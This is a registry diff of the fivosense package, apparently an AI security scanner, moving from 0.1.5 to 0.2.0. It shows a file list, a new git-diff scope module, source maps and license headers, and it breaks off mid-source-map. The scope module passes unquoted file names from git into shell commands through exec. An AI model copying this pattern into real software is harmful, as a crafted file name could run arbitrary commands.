fivosense 0.1.5 → 0.2.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/.kilo/skill/fivosense/skill.json +5 -5
- package/COMPLETE_SUMMARY.md +412 -0
- package/DEPLOYMENT_GUIDE.md +2 -2
- package/FINAL_VERIFICATION.md +316 -0
- package/GITHUB_PUSH.md +4 -4
- package/LICENSE +1 -1
- package/README.md +290 -208
- package/RELEASE_READY.md +3 -3
- package/bin/fivosense.mjs +6 -0
- package/dist/ai/client.d.ts +33 -0
- package/dist/ai/client.d.ts.map +1 -0
- package/dist/ai/client.js +170 -0
- package/dist/ai/client.js.map +1 -0
- package/dist/ai/judge.d.ts +9 -3
- package/dist/ai/judge.d.ts.map +1 -1
- package/dist/ai/judge.js +49 -14
- package/dist/ai/judge.js.map +1 -1
- package/dist/cli/index.d.ts +3 -1
- package/dist/cli/index.d.ts.map +1 -1
- package/dist/cli/index.js +6 -1
- package/dist/cli/index.js.map +1 -1
- package/dist/core/orchestrator.d.ts +34 -0
- package/dist/core/orchestrator.d.ts.map +1 -0
- package/dist/core/orchestrator.js +211 -0
- package/dist/core/orchestrator.js.map +1 -0
- package/dist/core/scope.d.ts +32 -0
- package/dist/core/scope.d.ts.map +1 -0
- package/dist/core/scope.js +149 -0
- package/dist/core/scope.js.map +1 -0
- package/dist/editors/vscode.d.ts +4 -2
- package/dist/editors/vscode.d.ts.map +1 -1
- package/dist/editors/vscode.js +6 -0
- package/dist/editors/vscode.js.map +1 -1
- package/dist/engine/adversary.d.ts +9 -2
- package/dist/engine/adversary.d.ts.map +1 -1
- package/dist/engine/adversary.js +47 -13
- package/dist/engine/adversary.js.map +1 -1
- package/dist/engine/graph.d.ts +4 -1
- package/dist/engine/graph.d.ts.map +1 -1
- package/dist/engine/graph.js +6 -0
- package/dist/engine/graph.js.map +1 -1
- package/dist/engine/poc.d.ts +26 -0
- package/dist/engine/poc.d.ts.map +1 -0
- package/dist/engine/poc.js +179 -0
- package/dist/engine/poc.js.map +1 -0
- package/dist/engine/reach.d.ts +4 -2
- package/dist/engine/reach.d.ts.map +1 -1
- package/dist/engine/reach.js +6 -0
- package/dist/engine/reach.js.map +1 -1
- package/dist/engine/sinks.d.ts +22 -32
- package/dist/engine/sinks.d.ts.map +1 -1
- package/dist/engine/sinks.js +338 -44
- package/dist/engine/sinks.js.map +1 -1
- package/dist/engine/sources.d.ts +11 -19
- package/dist/engine/sources.d.ts.map +1 -1
- package/dist/engine/sources.js +100 -24
- package/dist/engine/sources.js.map +1 -1
- package/dist/engine/taint.d.ts +6 -0
- package/dist/engine/taint.d.ts.map +1 -1
- package/dist/engine/taint.js +6 -0
- package/dist/engine/taint.js.map +1 -1
- package/dist/engine/verify.d.ts +4 -1
- package/dist/engine/verify.d.ts.map +1 -1
- package/dist/engine/verify.js +6 -0
- package/dist/engine/verify.js.map +1 -1
- package/dist/features/badge.d.ts +6 -0
- package/dist/features/badge.d.ts.map +1 -1
- package/dist/features/badge.js +4 -1
- package/dist/features/badge.js.map +1 -1
- package/dist/features/fix.d.ts +6 -0
- package/dist/features/fix.d.ts.map +1 -1
- package/dist/features/fix.js +4 -1
- package/dist/features/fix.js.map +1 -1
- package/dist/features/index.d.ts +6 -0
- package/dist/features/index.d.ts.map +1 -1
- package/dist/features/index.js +6 -0
- package/dist/features/index.js.map +1 -1
- package/dist/features/roast.d.ts +6 -0
- package/dist/features/roast.d.ts.map +1 -1
- package/dist/features/roast.js +4 -1
- package/dist/features/roast.js.map +1 -1
- package/dist/hooks/agent.d.ts +4 -1
- package/dist/hooks/agent.d.ts.map +1 -1
- package/dist/hooks/agent.js +6 -0
- package/dist/hooks/agent.js.map +1 -1
- package/dist/hooks/git.d.ts +34 -0
- package/dist/hooks/git.d.ts.map +1 -0
- package/dist/hooks/git.js +161 -0
- package/dist/hooks/git.js.map +1 -0
- package/dist/index.d.ts +4 -2
- package/dist/index.d.ts.map +1 -1
- package/dist/index.js +6 -0
- package/dist/index.js.map +1 -1
- package/dist/rules/destructive.d.ts +12 -21
- package/dist/rules/destructive.d.ts.map +1 -1
- package/dist/rules/destructive.js +306 -24
- package/dist/rules/destructive.js.map +1 -1
- package/dist/rules/secrets.d.ts +8 -10
- package/dist/rules/secrets.d.ts.map +1 -1
- package/dist/rules/secrets.js +294 -17
- package/dist/rules/secrets.js.map +1 -1
- package/mcp/index.js +55 -20
- package/mcp/package-lock.json +382 -0
- package/mcp/package.json +21 -4
- package/package.json +5 -5
- package/src/ai/client.ts +226 -0
- package/src/ai/judge.ts +58 -14
- package/src/cli/index.ts +7 -1
- package/src/core/orchestrator.ts +266 -0
- package/src/core/scope.ts +175 -0
- package/src/editors/vscode.ts +7 -0
- package/src/engine/adversary.ts +55 -12
- package/src/engine/graph.ts +7 -0
- package/src/engine/poc.ts +219 -0
- package/src/engine/reach.ts +7 -0
- package/src/engine/sinks.ts +358 -45
- package/src/engine/sources.ts +109 -24
- package/src/engine/taint.ts +7 -0
- package/src/engine/verify.ts +7 -0
- package/src/features/badge.ts +7 -0
- package/src/features/fix.ts +7 -0
- package/src/features/index.ts +7 -0
- package/src/features/roast.ts +7 -0
- package/src/hooks/agent.ts +7 -0
- package/src/hooks/git.ts +194 -0
- package/src/index.ts +7 -0
- package/src/rules/destructive.ts +316 -26
- package/src/rules/secrets.ts +306 -17
- package/vscode-extension/CHANGELOG.md +14 -2
- package/vscode-extension/LICENSE +1 -1
- package/vscode-extension/README.md +28 -23
- package/vscode-extension/fivosense-vscode-0.1.0.vsix +0 -0
- package/vscode-extension/fivosense-vscode-0.1.1.vsix +0 -0
- package/vscode-extension/package-lock.json +6 -6
- package/vscode-extension/package.json +7 -5
- package/vscode-extension/src/extension.ts +65 -11
|
@@ -0,0 +1,149 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* FivoSense - AI Security Scanner
|
|
3
|
+
* Copyright (c) 2026 thevinsoni
|
|
4
|
+
* Licensed under the MIT License
|
|
5
|
+
* https://github.com/thevinsoni/sense
|
|
6
|
+
*/
|
|
7
|
+
/**
|
|
8
|
+
* Scope Management - Track and filter relevant code changes
|
|
9
|
+
*/
|
|
10
|
+
import { exec } from 'child_process';
|
|
11
|
+
import { promisify } from 'util';
|
|
12
|
+
const execAsync = promisify(exec);
|
|
13
|
+
/**
|
|
14
|
+
* Get diff scope for current changes
|
|
15
|
+
*/
|
|
16
|
+
export async function getDiffScope(base = 'main') {
|
|
17
|
+
const scope = {
|
|
18
|
+
files: [],
|
|
19
|
+
lines: new Map(),
|
|
20
|
+
changedFunctions: new Map(),
|
|
21
|
+
};
|
|
22
|
+
try {
|
|
23
|
+
// Get changed files
|
|
24
|
+
const { stdout: filesOutput } = await execAsync(`git diff --name-only ${base}...HEAD`);
|
|
25
|
+
const files = filesOutput
|
|
26
|
+
.split('\n')
|
|
27
|
+
.filter(f => f.endsWith('.js') || f.endsWith('.ts') || f.endsWith('.jsx') || f.endsWith('.tsx'))
|
|
28
|
+
.filter(f => f.trim().length > 0);
|
|
29
|
+
scope.files = files;
|
|
30
|
+
// Get changed lines for each file
|
|
31
|
+
for (const file of files) {
|
|
32
|
+
try {
|
|
33
|
+
const { stdout: diffOutput } = await execAsync(`git diff ${base}...HEAD -- ${file}`);
|
|
34
|
+
const changedLines = parseDiffLines(diffOutput);
|
|
35
|
+
scope.lines.set(file, changedLines);
|
|
36
|
+
}
|
|
37
|
+
catch (error) {
|
|
38
|
+
console.warn(`Failed to get diff for ${file}:`, error);
|
|
39
|
+
}
|
|
40
|
+
}
|
|
41
|
+
return scope;
|
|
42
|
+
}
|
|
43
|
+
catch (error) {
|
|
44
|
+
console.warn('Failed to get diff scope:', error);
|
|
45
|
+
return scope;
|
|
46
|
+
}
|
|
47
|
+
}
|
|
48
|
+
/**
|
|
49
|
+
* Parse diff output to extract changed line numbers
|
|
50
|
+
*/
|
|
51
|
+
function parseDiffLines(diff) {
|
|
52
|
+
const lines = new Set();
|
|
53
|
+
const diffLines = diff.split('\n');
|
|
54
|
+
let currentLine = 0;
|
|
55
|
+
for (const line of diffLines) {
|
|
56
|
+
// Parse hunk header: @@ -1,5 +1,7 @@
|
|
57
|
+
const hunkMatch = line.match(/^@@\s+-\d+,?\d*\s+\+(\d+),?(\d*)\s+@@/);
|
|
58
|
+
if (hunkMatch) {
|
|
59
|
+
currentLine = parseInt(hunkMatch[1], 10);
|
|
60
|
+
continue;
|
|
61
|
+
}
|
|
62
|
+
// Track added/modified lines
|
|
63
|
+
if (line.startsWith('+') && !line.startsWith('+++')) {
|
|
64
|
+
lines.add(currentLine);
|
|
65
|
+
currentLine++;
|
|
66
|
+
}
|
|
67
|
+
else if (!line.startsWith('-')) {
|
|
68
|
+
currentLine++;
|
|
69
|
+
}
|
|
70
|
+
}
|
|
71
|
+
return lines;
|
|
72
|
+
}
|
|
73
|
+
/**
|
|
74
|
+
* Filter findings to only those in changed scope
|
|
75
|
+
*/
|
|
76
|
+
export function filterFindingsByScope(findings, file, scope) {
|
|
77
|
+
const changedLines = scope.lines.get(file);
|
|
78
|
+
if (!changedLines || changedLines.size === 0) {
|
|
79
|
+
// No scope info, include all findings
|
|
80
|
+
return findings;
|
|
81
|
+
}
|
|
82
|
+
return findings.filter(finding => {
|
|
83
|
+
const line = finding.location?.line;
|
|
84
|
+
if (!line)
|
|
85
|
+
return false;
|
|
86
|
+
// Include if exact line changed
|
|
87
|
+
if (changedLines.has(line))
|
|
88
|
+
return true;
|
|
89
|
+
// Include if within 5 lines of a change (context)
|
|
90
|
+
for (const changedLine of changedLines) {
|
|
91
|
+
if (Math.abs(line - changedLine) <= 5)
|
|
92
|
+
return true;
|
|
93
|
+
}
|
|
94
|
+
return false;
|
|
95
|
+
});
|
|
96
|
+
}
|
|
97
|
+
/**
|
|
98
|
+
* Get scope for staged changes
|
|
99
|
+
*/
|
|
100
|
+
export async function getStagedScope() {
|
|
101
|
+
const scope = {
|
|
102
|
+
files: [],
|
|
103
|
+
lines: new Map(),
|
|
104
|
+
changedFunctions: new Map(),
|
|
105
|
+
};
|
|
106
|
+
try {
|
|
107
|
+
// Get staged files
|
|
108
|
+
const { stdout: filesOutput } = await execAsync('git diff --cached --name-only --diff-filter=ACM');
|
|
109
|
+
const files = filesOutput
|
|
110
|
+
.split('\n')
|
|
111
|
+
.filter(f => f.endsWith('.js') || f.endsWith('.ts') || f.endsWith('.jsx') || f.endsWith('.tsx'))
|
|
112
|
+
.filter(f => f.trim().length > 0);
|
|
113
|
+
scope.files = files;
|
|
114
|
+
// Get changed lines for each file
|
|
115
|
+
for (const file of files) {
|
|
116
|
+
try {
|
|
117
|
+
const { stdout: diffOutput } = await execAsync(`git diff --cached -- ${file}`);
|
|
118
|
+
const changedLines = parseDiffLines(diffOutput);
|
|
119
|
+
scope.lines.set(file, changedLines);
|
|
120
|
+
}
|
|
121
|
+
catch (error) {
|
|
122
|
+
console.warn(`Failed to get staged diff for ${file}:`, error);
|
|
123
|
+
}
|
|
124
|
+
}
|
|
125
|
+
return scope;
|
|
126
|
+
}
|
|
127
|
+
catch (error) {
|
|
128
|
+
console.warn('Failed to get staged scope:', error);
|
|
129
|
+
return scope;
|
|
130
|
+
}
|
|
131
|
+
}
|
|
132
|
+
/**
|
|
133
|
+
* Check if a line is in scope
|
|
134
|
+
*/
|
|
135
|
+
export function isLineInScope(file, line, scope) {
|
|
136
|
+
const changedLines = scope.lines.get(file);
|
|
137
|
+
if (!changedLines)
|
|
138
|
+
return false;
|
|
139
|
+
// Exact match
|
|
140
|
+
if (changedLines.has(line))
|
|
141
|
+
return true;
|
|
142
|
+
// Context match (within 5 lines)
|
|
143
|
+
for (const changedLine of changedLines) {
|
|
144
|
+
if (Math.abs(line - changedLine) <= 5)
|
|
145
|
+
return true;
|
|
146
|
+
}
|
|
147
|
+
return false;
|
|
148
|
+
}
|
|
149
|
+
//# sourceMappingURL=scope.js.map
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"scope.js","sourceRoot":"","sources":["../../src/core/scope.ts"],"names":[],"mappings":"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"}
|
package/dist/editors/vscode.d.ts
CHANGED
|
@@ -1,6 +1,8 @@
|
|
|
1
1
|
/**
|
|
2
|
-
*
|
|
3
|
-
*
|
|
2
|
+
* FivoSense - AI Security Scanner
|
|
3
|
+
* Copyright (c) 2026 thevinsoni
|
|
4
|
+
* Licensed under the MIT License
|
|
5
|
+
* https://github.com/thevinsoni/sense
|
|
4
6
|
*/
|
|
5
7
|
export interface VSCodeDiagnostic {
|
|
6
8
|
file: string;
|
|
@@ -1 +1 @@
|
|
|
1
|
-
{"version":3,"file":"vscode.d.ts","sourceRoot":"","sources":["../../src/editors/vscode.ts"],"names":[],"mappings":"AAAA
|
|
1
|
+
{"version":3,"file":"vscode.d.ts","sourceRoot":"","sources":["../../src/editors/vscode.ts"],"names":[],"mappings":"AAAA;;;;;GAKG;AASH,MAAM,WAAW,gBAAgB;IAC/B,IAAI,EAAE,MAAM,CAAC;IACb,IAAI,EAAE,MAAM,CAAC;IACb,MAAM,EAAE,MAAM,CAAC;IACf,QAAQ,EAAE,OAAO,GAAG,SAAS,GAAG,MAAM,CAAC;IACvC,OAAO,EAAE,MAAM,CAAC;IAChB,MAAM,EAAE,MAAM,CAAC;IACf,IAAI,CAAC,EAAE,MAAM,CAAC;CACf;AAED;;GAEG;AACH,wBAAsB,gBAAgB,CAAC,KAAK,EAAE,MAAM,EAAE,GAAG,OAAO,CAAC,gBAAgB,EAAE,CAAC,CAoDnF;AAED;;GAEG;AACH,wBAAgB,kBAAkB,CAAC,UAAU,EAAE,gBAAgB,GAAG,GAAG,EAAE,CA4BtE;AAED;;GAEG;AACH,eAAO,MAAM,QAAQ;4BACW,MAAM;4BAKN,MAAM,QAAQ,MAAM;sCAKV,gBAAgB;CAGzD,CAAC"}
|
package/dist/editors/vscode.js
CHANGED
|
@@ -1 +1 @@
|
|
|
1
|
-
{"version":3,"file":"vscode.js","sourceRoot":"","sources":["../../src/editors/vscode.ts"],"names":[],"mappings":"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"}
|
|
1
|
+
{"version":3,"file":"vscode.js","sourceRoot":"","sources":["../../src/editors/vscode.ts"],"names":[],"mappings":"AAAA;;;;;GAKG;AAEH;;;GAGG;AAEH,OAAO,EAAE,SAAS,EAAE,iBAAiB,EAAE,MAAM,aAAa,CAAC;AAY3D;;GAEG;AACH,MAAM,CAAC,KAAK,UAAU,gBAAgB,CAAC,KAAe;IACpD,MAAM,WAAW,GAAuB,EAAE,CAAC;IAE3C,KAAK,MAAM,IAAI,IAAI,KAAK,EAAE,CAAC;QACzB,IAAI,CAAC;YACH,MAAM,MAAM,GAAG,MAAM,SAAS,CAAC,IAAI,CAAC,CAAC;YAErC,yCAAyC;YACzC,MAAM,CAAC,eAAe,CAAC,OAAO,CAAC,IAAI,CAAC,EAAE;gBACpC,WAAW,CAAC,IAAI,CAAC;oBACf,IAAI;oBACJ,IAAI,EAAE,IAAI,CAAC,QAAQ,CAAC,IAAI;oBACxB,MAAM,EAAE,IAAI,CAAC,QAAQ,CAAC,MAAM;oBAC5B,QAAQ,EAAE,IAAI,CAAC,QAAQ,KAAK,UAAU,CAAC,CAAC,CAAC,OAAO,CAAC,CAAC,CAAC,SAAS;oBAC5D,OAAO,EAAE,GAAG,IAAI,CAAC,OAAO,KAAK,IAAI,CAAC,IAAI,EAAE;oBACxC,MAAM,EAAE,WAAW;oBACnB,IAAI,EAAE,IAAI,CAAC,GAAG;iBACf,CAAC,CAAC;YACL,CAAC,CAAC,CAAC;YAEH,iCAAiC;YACjC,MAAM,CAAC,OAAO,CAAC,OAAO,CAAC,MAAM,CAAC,EAAE;gBAC9B,WAAW,CAAC,IAAI,CAAC;oBACf,IAAI;oBACJ,IAAI,EAAE,MAAM,CAAC,IAAI;oBACjB,MAAM,EAAE,CAAC;oBACT,QAAQ,EAAE,OAAO;oBACjB,OAAO,EAAE,GAAG,MAAM,CAAC,WAAW,KAAK,MAAM,CAAC,KAAK,EAAE;oBACjD,MAAM,EAAE,WAAW;oBACnB,IAAI,EAAE,QAAQ;iBACf,CAAC,CAAC;YACL,CAAC,CAAC,CAAC;YAEH,8CAA8C;YAC9C,MAAM,CAAC,WAAW,CAAC,OAAO,CAAC,GAAG,CAAC,EAAE;gBAC/B,WAAW,CAAC,IAAI,CAAC;oBACf,IAAI;oBACJ,IAAI,EAAE,CAAC;oBACP,MAAM,EAAE,CAAC;oBACT,QAAQ,EAAE,OAAO;oBACjB,OAAO,EAAE,GAAG,GAAG,CAAC,WAAW,KAAK,GAAG,CAAC,QAAQ,GAAG;oBAC/C,MAAM,EAAE,WAAW;oBACnB,IAAI,EAAE,aAAa;iBACpB,CAAC,CAAC;YACL,CAAC,C